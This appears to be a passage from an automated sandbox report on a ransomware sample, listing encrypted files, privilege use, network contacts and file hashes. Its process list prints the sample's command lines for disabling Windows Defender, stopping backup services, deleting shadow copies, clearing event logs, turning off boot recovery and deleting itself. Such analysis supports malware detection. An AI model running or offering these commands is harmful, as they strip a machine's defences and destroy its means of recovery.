| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-60_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\StoreLogo\PaintApplist.scale-100.png | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Maw5vkKhUd80.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_nabgR66mXPo0.fayg2 | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe
"C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12af1" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12af1" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12af1" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\MyEY_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 52.109.8.21:443 | tcp | |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/2328-115-0x0000000000000000-mapping.dmp
memory/1360-116-0x0000000000000000-mapping.dmp
memory/2648-117-0x0000000000000000-mapping.dmp
memory/972-118-0x0000000000000000-mapping.dmp
memory/896-119-0x0000000000000000-mapping.dmp
memory/764-120-0x0000000000000000-mapping.dmp
memory/2200-121-0x0000000000000000-mapping.dmp
memory/3548-122-0x0000000000000000-mapping.dmp
memory/3256-123-0x0000000000000000-mapping.dmp
memory/3336-124-0x0000000000000000-mapping.dmp
memory/3304-125-0x0000000000000000-mapping.dmp
memory/3468-126-0x0000000000000000-mapping.dmp
memory/1404-127-0x0000000000000000-mapping.dmp
memory/1716-128-0x0000000000000000-mapping.dmp
memory/1624-129-0x0000000000000000-mapping.dmp
memory/1084-130-0x0000000000000000-mapping.dmp
memory/408-131-0x0000000000000000-mapping.dmp
memory/372-132-0x0000000000000000-mapping.dmp
memory/692-133-0x0000000000000000-mapping.dmp
memory/2212-134-0x0000000000000000-mapping.dmp
memory/904-135-0x0000000000000000-mapping.dmp
memory/1296-136-0x0000000000000000-mapping.dmp
memory/1236-137-0x0000000000000000-mapping.dmp
memory/1476-138-0x0000000000000000-mapping.dmp
memory/1636-139-0x0000000000000000-mapping.dmp
memory/1920-140-0x0000000000000000-mapping.dmp
memory/2236-141-0x0000000000000000-mapping.dmp
memory/2168-142-0x0000000000000000-mapping.dmp
memory/3408-143-0x0000000000000000-mapping.dmp
memory/512-144-0x0000000000000000-mapping.dmp
memory/3492-145-0x0000000000000000-mapping.dmp
memory/3312-146-0x0000000000000000-mapping.dmp
memory/2420-147-0x0000000000000000-mapping.dmp
memory/3184-148-0x0000000000000000-mapping.dmp
memory/3776-149-0x0000000000000000-mapping.dmp
memory/4024-150-0x0000000000000000-mapping.dmp
memory/3808-151-0x0000000000000000-mapping.dmp
memory/1352-152-0x0000000000000000-mapping.dmp
memory/3960-153-0x0000000000000000-mapping.dmp
memory/656-154-0x0000000000000000-mapping.dmp
memory/960-155-0x0000000000000000-mapping.dmp
memory/4016-156-0x0000000000000000-mapping.dmp
memory/3596-157-0x0000000000000000-mapping.dmp
memory/524-158-0x0000000000000000-mapping.dmp
memory/3424-159-0x0000000000000000-mapping.dmp
memory/1716-160-0x0000000000000000-mapping.dmp
memory/1212-161-0x0000000000000000-mapping.dmp
memory/2032-162-0x0000000000000000-mapping.dmp
memory/412-163-0x0000000000000000-mapping.dmp
memory/2436-164-0x0000000000000000-mapping.dmp
memory/900-165-0x0000000000000000-mapping.dmp
memory/1328-166-0x0000000000000000-mapping.dmp
memory/2324-167-0x0000000000000000-mapping.dmp
memory/2240-168-0x0000000000000000-mapping.dmp
memory/2036-169-0x0000000000000000-mapping.dmp
memory/2000-170-0x0000000000000000-mapping.dmp
memory/2668-171-0x0000000000000000-mapping.dmp
memory/3592-172-0x0000000000000000-mapping.dmp
memory/760-173-0x0000000000000000-mapping.dmp
memory/3456-174-0x0000000000000000-mapping.dmp
memory/3616-175-0x0000000000000000-mapping.dmp
memory/3832-176-0x0000000000000000-mapping.dmp
memory/3800-177-0x0000000000000000-mapping.dmp
memory/1348-178-0x0000000000000000-mapping.dmp
memory/596-180-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-179-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-181-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-183-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-182-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-186-0x000001C24E670000-0x000001C24E692000-memory.dmp
memory/596-184-0x000001C234050000-0x000001C234052000-memory.dmp
memory/596-185-0x000001C234053000-0x000001C234055000-memory.dmp
memory/596-187-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-188-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-189-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-190-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-191-0x000001C24E820000-0x000001C24E896000-memory.dmp
memory/596-192-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-196-0x000001C234056000-0x000001C234058000-memory.dmp
memory/596-217-0x000001C232770000-0x000001C232772000-memory.dmp
memory/596-218-0x000001C232770000-0x000001C232772000-memory.dmp
memory/2364-220-0x0000024997D10000-0x0000024997D12000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/2364-221-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-222-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-223-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-224-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-225-0x0000024998000000-0x0000024998022000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d81918b1c01f5ae53ad4afb0824da5e4 |
| SHA1 | e0471b288182be00b98d8bcc5082735a4f454cb5 |
| SHA256 | cb8d484e0487a9d5499393604444b127ff494cce575e97da719afbc87ba66509 |
| SHA512 | 3fae65360f90cce5c5cb55258015a1ea765c1e897db6267ea962ec1ee2be4dbc71ea7df73b2d8a1dcd9e8d377c5e7b051ba91d68f082c068d435fbc241bd0ae3 |
memory/2364-227-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-228-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-229-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/596-230-0x000001C234058000-0x000001C234059000-memory.dmp
memory/2364-232-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-233-0x00000249B04F3000-0x00000249B04F5000-memory.dmp
memory/2364-231-0x00000249B04F0000-0x00000249B04F2000-memory.dmp
memory/2364-234-0x00000249B2650000-0x00000249B26C6000-memory.dmp
memory/2364-235-0x0000024997D10000-0x0000024997D12000-memory.dmp
memory/2364-260-0x00000249B04F6000-0x00000249B04F8000-memory.dmp
memory/2364-262-0x00000249B04F8000-0x00000249B04F9000-memory.dmp
C:\MyEY_HOW_TO_DECRYPT.txt
| MD5 | 9d3e4af36fcaeae21b659744acaea5ff |
| SHA1 | f5f10926e75e0e2b2a687957211f7a415a315a7b |
| SHA256 | 155af800ee95992ea5afcd163da8f3b4dd4b3ba20368031cc4f97b39cc23a175 |
| SHA512 | 05983dc926079832294182b17f86196cfd7f6f3a70893774283baa98fb717d4419b54e22c0de1c4d593d12842be886f8a8eed633553de3b5a7f7c4803eefc896 |